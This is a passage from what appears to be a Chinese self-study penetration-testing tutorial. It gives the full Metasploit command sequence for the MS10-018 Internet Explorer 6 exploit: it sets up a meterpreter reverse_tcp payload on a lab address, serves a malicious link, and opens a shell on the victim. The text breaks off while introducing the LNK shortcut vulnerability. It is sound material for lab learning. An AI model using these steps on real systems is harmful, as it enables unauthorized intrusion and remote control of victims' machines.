本文章为作者渗透测试自学系列文章,所有内容仅作为个人学习实验使用,请勿用于实战环境。
msf利用浏览器漏洞渗透
这里利用IE6和漏洞ms10_018
原理:自己制作一个网上的资源,通过让目标主机访问这个资源,利用目标主机中浏览器的漏洞来共同导致被攻击的结果。
msfconsole
启动msf
search ms10_018
查看相关漏洞
use exploit/windows/browser/ms10_018_ie_behaviors
选择相应模块
set LHOST 192.168.223.140
set URIPATH test
set PAYLOAD windows/meterpreter/reverse_tcp
设置payload模块
set SRVHOST 192.168.223.140
设置反弹到的ip
exploit
生成网页链接,被攻击机使用ie有浏览器漏洞访问这个链接后,kali中显示攻击成功,
sessions -l
查看会话
seesions -i id
选择id
shell命令转到被攻击机的终端中,可以进行相关操作。
msf利用快捷方式漏洞
原理: 利用系统解析后缀名的机制,恶意构造一个lnk(快捷方式)的文件,并构造一串程序代码来欺骗操作系统,的那个shell32.dll解析到这串编码的时候&#x